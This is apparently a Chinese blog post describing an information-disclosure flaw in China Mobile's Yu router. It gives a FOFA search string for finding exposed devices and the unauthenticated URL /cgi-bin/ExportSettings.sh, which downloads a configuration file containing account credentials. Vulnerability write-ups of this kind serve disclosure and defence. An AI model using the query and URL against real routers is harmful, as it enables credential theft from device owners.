中国移动禹路由ExportSettings.sh敏感信息泄露漏洞

中国移动 禹路由 ExportSettings.sh 敏感信息泄露漏洞

漏洞描述

中国移动 禹路由 ExportSettings.sh 存在敏感信息泄露漏洞,攻击者通过漏洞获取配置文件,其中包含账号密码等敏感信息

漏洞影响

中国移动 禹路由

FOFA

title="互联世界 物联未来-登录"

漏洞复现

登录页面如下

 

 

访问Url

http://X.X.X.X/cgi-bin/ExportSettings.sh

 

 

 出现信息,并且下载文件

 

 End。

posted @   我就去睡觉  阅读(654)  评论(0编辑  收藏  举报
相关博文:
·  电信网关服务器默认口令
·  JEEWMS 本地文件包含漏洞-CNVD-2020-61972
·  中移铁通禹路由 ExportSettings 敏感信息泄露漏洞
·  荷兰宽带数据泄露
·  Pikachu漏洞靶场 敏感信息泄露
阅读排行:
· 地球OL攻略 —— 某应届生求职总结
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 提示词工程——AI应用必不可少的技术
· .NET周刊【3月第1期 2025-03-02】
点击右上角即可分享
微信分享提示
AI IDE Trae